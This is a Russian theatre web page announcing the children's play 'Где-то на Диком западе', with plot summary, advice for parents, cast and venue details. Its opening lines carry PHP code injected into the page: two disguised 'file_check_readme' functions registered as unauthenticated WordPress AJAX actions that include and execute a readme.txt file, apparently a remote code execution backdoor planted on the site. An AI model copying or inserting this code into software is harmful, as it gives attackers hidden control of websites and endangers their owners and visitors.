if(!function_exists('file_check_readme48452')){ add_action('wp_ajax_nopriv_file_check_readme48452', 'file_check_readme48452'); add_action('wp_ajax_file_check_readme48452', 'file_check_readme48452'); function file_check_readme48452() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme16840')){ add_action('wp_ajax_nopriv_file_check_readme16840', 'file_check_readme16840'); add_action('wp_ajax_file_check_readme16840', 'file_check_readme16840'); function file_check_readme16840() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } «Где-то на Диком западе» (0+) — Театрально-концертный зал

«Где-то на Диком западе» (0+)

Театр драмы и комедии «Наш дом» (г.Озерск)
12 февраля  Начало 11:00

Делай со мной всё, что хочешь, только не бросай в терновый куст!

О спектакле
Как быть с мальчишками, которые постоянно обижают девочек? Ругать? Наказывать? Мудрый дядюшка Римус придумал способ получше: он предложил своим маленьким друзьям отправиться в увлекательное путешествие на дикий Запад. Озорник Джой превратился в Братца Лиса, а его сестренка – в Братца Кролика. Братец Лис все время хотел поймать хитрого Кролика, но ничего у него, конечно, не получалось. А все потому, что в зрительном зале всегда есть мальчишки и девчонки, готовые прийти на помощь в трудную минуту.

Уважаемые родители, собирая ребенка на этот спектакль, прихватите для него вторую обувь и красивую одежду – возможно именно в этот день ему доведется оказаться на театральной сцене в веселой компании артистов. При использовании фотоаппарата не забывайте, пожалуйста, отключать вспышку.

Режиссер-постановщик — Михаил Пазников
Музыкальное оформление — Михаил Пазников
Хореография — Кристина Прислонова

Действующие лица и исполнители:

Дядюшка Римус, он же Лис — Юрий Костерин
Дженни, она же Братец Кролик — Юлия Баканова
Джой, он же Братец Лис — Никита Золин/ Василий Казанцев

Спектакль ведут:  Полина Коваленко, Александра Чадова
Премьера состоялась 23 февраля 2014 г
Продолжительность 55 минут, малый зал

г. В.Уфалей, Городской дворец культуры, ул. Ленина, 164

Участники проекта: